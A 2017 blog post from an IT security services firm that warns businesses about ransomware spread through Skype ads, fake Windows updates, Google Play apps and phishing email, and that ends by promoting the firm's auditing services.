535 Connecticut Ave. Suite 104
Norwalk, CT 06854
Empire State Building
350 Fifth Avenue, 59th fl.
New York City, NY 10118

Featured Article

March 31, 2017

4 Places You May Find Ransomware Hiding

Remember the days when you really had to try to get a computer virus? Well, those days are gone. We’re living in a different world now, where malware can be hiding just about anywhere on the Internet. In fact, most of the time it's right under your nose. 

One new type of malware that you need to be extra careful about is called ransomware, which is a type of malware that can lock a computer and/ or encrypt its files.

Ransomware is one of the most dangerous types of malware circulating on the Internet, and after a record-setting year in 2016, experts predict we will see a lot more of it this year.

At this point, nearly 50 percent of businesses have been hit with ransomware. And the average ransom demand is $679.

So, where has ransomware been popping up recently? Here are four places where it could be hiding in your business:

1. Skype: According to ZDNet, multiple users have recently seen advertisements on Microsoft’s Skype application that contain ransomware.

One user reported that the ransomware was disguised as an update for the Flash plug-in.

As ZDNet explains, once the download is started it triggers obfuscated JavaScript. Then, the code opens a new command line, deletes the application and runs a PowerShell command. PowerShell then downloads a JavaScript Encoded Script, or JSE, from a dead domain. This process allows the ransomware to evade antivirus software.

So if you’re using Skype in your business, be very careful not to run any suspicious looking Flash updates or you will have a ransomware attack to deal with.

2.Desktops: One type of ransomware, called Fantom, can be disguised as a Microsoft Windows update. With this type of ransomware, a user will see a fake Windows update box on his or her desktop. The fake update looks very official, as it contains words like “critical update” and has a Microsoft copyright symbol.

Once the user is tricked and the download process takes place, though, Fantom will start encrypting files in the background using AES-128 encryption. Users will see a ransom note that contains the file name Decrypt_Your_Files.HTML. It will also have a user ID key and payment instructions. 

3. Google Play: Think ransomware is only for laptops and PCS? Think again. Mobile ransomware is exploding in popularity right now.

Ransomware, in fact, has been discovered lurking in the Google Play store, disguised as normal-looking applications. All an end user has to do is download a fake application with embedded ransomware by mistake, and ransomware will be deployed onto the mobile device.  

This week, researchers found a new strain of Android-based ransomware which is also capable of evading detection from antivirus software. However, this type of ransomware cannot be unencrypted—even after a payment is made.

4. Email inboxes: Email is still one of the top ways that hackers are deploying ransomware. In fact, 93 percent of phishing emails now contain ransomware. End users should be on full alert to avoid clicking on suspicious emails or opening attachments from unknown senders.

A new breed of hacktrepeneurs has awoken and they have little to fear and everything to gain by infecting as many companies as possible and extorting money from them. Apex Technology Services stands ready to protect your company regardless of whether it’s located in New York CityWhite Plains, New York; Connecticut; Australia; Europe; or anywhere else. Our full suite of cybersecurity and IT support services is at your disposal, enabling you to spend less time worrying about and more time growing your business.

To ensure your security, consider one of our most popular services — Auditing & Documentationwhich pinpoints vulnerabilities in your infrastructure, process flow and internal security procedures.







Related Articles